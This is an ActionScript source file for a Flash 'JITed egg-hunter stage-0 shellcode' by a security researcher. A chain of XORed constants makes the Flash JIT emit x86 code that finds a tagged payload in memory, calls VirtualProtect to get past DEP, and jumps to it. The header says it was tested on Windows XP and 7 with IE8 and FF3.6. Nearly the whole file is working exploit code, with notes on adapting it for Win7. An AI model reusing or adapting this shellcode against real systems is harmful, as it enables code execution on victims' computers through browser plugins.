// JITed egg-hunter stage-0 shellcode
// (Permanent DEP bypass)
//
// By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]//
//
// TAG=3135330731353307
// its mean 0x07333531 twice!
//
//
// This version is more universal than old STAGE-0 (that have use Flash Dictionary addr leakage)
//
//
// Example of usage and tools for modify: http://www.dsecrg.com/files/pub/tools/JIT.zip
//
// Find shellcode by TAG - need time ))
// Find VirtualProtect address
// Mark shellcode mem as executable
// Jump on it...
//
//
// Tested on Windows XP SP3/SP2, Windows 7: IE8, FF3.6
//
// For Win7 make differ from comments
// it's needed cos used skape (mmiller@hick.org) shellcode (NtDisplayString)
//
//
package {
import flash.display.*
public class Loadzz2 extends MovieClip
{
function funcXOR1()
{
var jit=(0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^
0x3c58d231^
0x3cffca80^
0x3c0fce80^
0x3c429090^
0x3c436a52^ //0x3c6d6a52 for Win7
0x3c2ecd58^
0x6a90053c^
0x6a905a5a^
0x3c90d874^
0x31b85959^
0x3c900733^
0x6aaffa8b^
0x6aafd175^
0x6a595990^
0x3c57c775^
0x3c44ec83^
0x3c90C033^
0x3c9030b0^
0x3c008b64^
0x3c0c408b^
0x3c1c408b^
0x3c08508b^
0x3c20788b^
0x3c90008b^
0x6a6b3f80^
0x3c90eA75^
0x3c904747^
0x6a653f80^
0x3c90ef75^
0x3c904747^
0x6a723f80^
0x3c90ef75^
0x3c904747^
0x6a6e3f80^
0x3c90ef75^
0x3c529090^
0x3c3cc283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c78c283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c18c283^
0x3c903a8b^
0x3c04c283^
0x3c901a8b^
0x3c241c03^
0x3c04c283^
0x3c90328b^
0x3c243403^
0x3c04c283^
0x3c900a8b^
0x3c240c03^
0x3cb89090^
0x3c900000^
0x3c9063b0^
0x3c5074b4^
0x3cb89090^
0x3c906574^
0x3c9072b0^
0x3c506fb4^
0x3cb89090^
0x3c90506c^
0x3c9075b0^
0x3c5061b4^
0x3cb89090^
0x3c907472^
0x3c9056b0^
0x3c5069b4^
0x3c90d78b^
0x3c90C033^
0x3c90ff33^
0x3c535156^
0x3c909090^
0x3c909090^
0x3c574790^
0x3c24048b^
0x3c02e0c1^
0x3c90f003^
0x3c90068b^
0x3c20c483^
0x3c240403^
0x3c20ec83^
0x3c90c933^
0x3c900eb1^
0x3c10c483^
0x3c90f48b^
0x3c90f88b^
0x3c18c483^
0x6a90a6f3^
0x14901474^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c9090eb^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c90e7d1^
0x3c90cf03^
0x3c90c033^
0x3c018b66^
0x3c02e0c1^
0x3c90c303^
0x3c90188b^
0x3c10c483^
0x3c241c03^
0x3c5cc483^ // for Win7 0x3c60c483
0x3c90905F^
0x3c406a54^
0x3c90016a^
0x3cd3ff57^
0x3c90e7ff^
0x3ccccccc);
return jit;
}
function Loadzz2()
{
var ret1=funcXOR1();
}
}
}